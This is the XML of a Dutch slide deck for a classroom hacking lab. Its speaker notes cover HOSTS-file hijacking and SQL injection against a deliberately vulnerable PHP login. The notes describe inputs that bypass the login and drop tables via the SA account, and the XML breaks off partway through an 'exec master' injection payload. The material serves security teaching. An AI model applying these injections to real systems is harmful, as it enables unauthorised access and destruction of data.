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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="280" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="288" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="302" r:id="rId21"/>
    <p:sldId id="304" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="303" r:id="rId24"/>
    <p:sldId id="308" r:id="rId25"/>
    <p:sldId id="299" r:id="rId26"/>
    <p:sldId id="300" r:id="rId27"/>
    <p:sldId id="305" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="307"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282" r:id="rId56"/>
    <p:sldId id="334" r:id="rId57"/>
    <p:sldId id="33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CC"/>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5270" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="33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B50AA-5A32-437C-BDF7-60EB31CCB838}" type="datetimeFigureOut">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>26-9-2017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B8381-21F2-4384-96C2-A63255ED99F3}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>‹nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399500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16B8381-21F2-4384-96C2-A63255ED99F3}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142484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Als het goed is kom je nu uit op marktplaats. Realiseer je goed dat dit ook een malafide website had kunnen zijn.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t>NB: het hacken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> van de HOSTS file kan eenvoudig gebeuren door een TROJAN of andere MALWARE. (Dit dankzij Windows OS zwakheden)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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280555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 gaan we laten op in zoomen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68333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 gaan we laten op in zoomen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146114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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591905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input wordt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> uiteindelijk doorgegeven aan een PHP pagina op de server, LOGINCONTROLE.PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>In LOGINCONTROLE.PHP staat ergens een query die een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> statement afvuurt op een database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Een SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> hacker, probeert zich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dmv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> een paar testen voor te stellen hoe die query samengesteld zou kunnen zijn. Hij kan deze nl niet zien. De query leeft op de webserver. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Door nu bepaalde input in het eerdere invoerveld te stoppen kan de query zodanig worden gemaakt dat deze anders wordt dan de programmeur zich had voorgesteld. </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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3201158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err="1" smtClean="0"/>
              <a:t>SQLinjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> staat en valt bij de incompetentie van de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webprogrammeur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> en de Database administrator. Je zou zeggen dat dit eigenlijk niet mag voorkomen maar de praktijk wijst uit dat de meeste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> nog steeds SQL-I gerelateerd zijn.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Welke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> fouten er precies begaan zijn, mogen studenten verderop zelf proberen uit te zoeken.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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="985501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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3451972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Indien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> iemand alleen wil werken op zijn machine zal zijn netwerk moeten worden aangepast naar "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL"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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: Mocht je een machine hebben waar om wat voor reden dan ook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Vbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0"/>
              <a:t> niet op kan draaien of geen UTP-aansluiting op zit,  neem  plaats naast iemand bij wie het wel werkt. Password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>P@ssw0rd</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218347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Controleer of het goed werkt in eerste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> instantie</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050180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Dit is de workflow van het inlog proces. In de volgende</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> sheet komt de code</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282120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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12127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Dit zijn de bij behorende </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> pagina's. Deze zijn te bekijken met </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> Web dat geïnstalleerd staat of met </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1241230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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362106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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393631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Als het goed is kunnen studenten overweg met het management console van SQLS. Zo niet even voordoen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840782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Hiermee wordt illegaal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ingelogged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t>. Uitleg komt in de volgende sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2480693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Hiermee wordt illegaal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ingelogged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t>. Uitleg komt in de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" smtClean="0"/>
              <a:t>volgende sheet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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="568337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fout is dat er bv niet is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>gechecked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> of de uitkomst slechts 1 rij zou bevatten. (is echter ook niet waterdicht)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> Studenten mogen zelf later uit zoeken hoe dit tegen te gaan.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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345749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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167588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Wederom weet een hacker dit niet.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> Door te proberen komt hij hier echter eenvoudig achter.</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899938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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> blijft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> gebruikt worden om malafide commando's in te voeren.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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296085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webbrowser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> communiceert met de webserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dmv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> het gebruikelijke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>/response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-Er vindt dataverkeer plaats tussen webserver en database om bv PHP-pagina's te genereren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-HTML en PHP worden van het filesysteem van de webserver gehaald. (ook CSS en JS trouwens)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>-Wat zou hier nu fout kunnen gaan?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29371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Kijk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> welke tabellen er allemaal zijn.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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2277986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Hiermee wordt illegaal een drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> commando uitgevoerd.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> Uitleg in de volgende sheet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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2014617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Het werkt omdat in de PHP code de connectie naar de database gemaakt is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> het SA account.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316454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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2308236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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> blijft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> gebruikt worden om malafide commando's in te voeren. </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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268476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baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Het begint met het achterhalen van allerlei informatie.</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305396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sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>master</a:t>
            </a:r>
            <a:r>
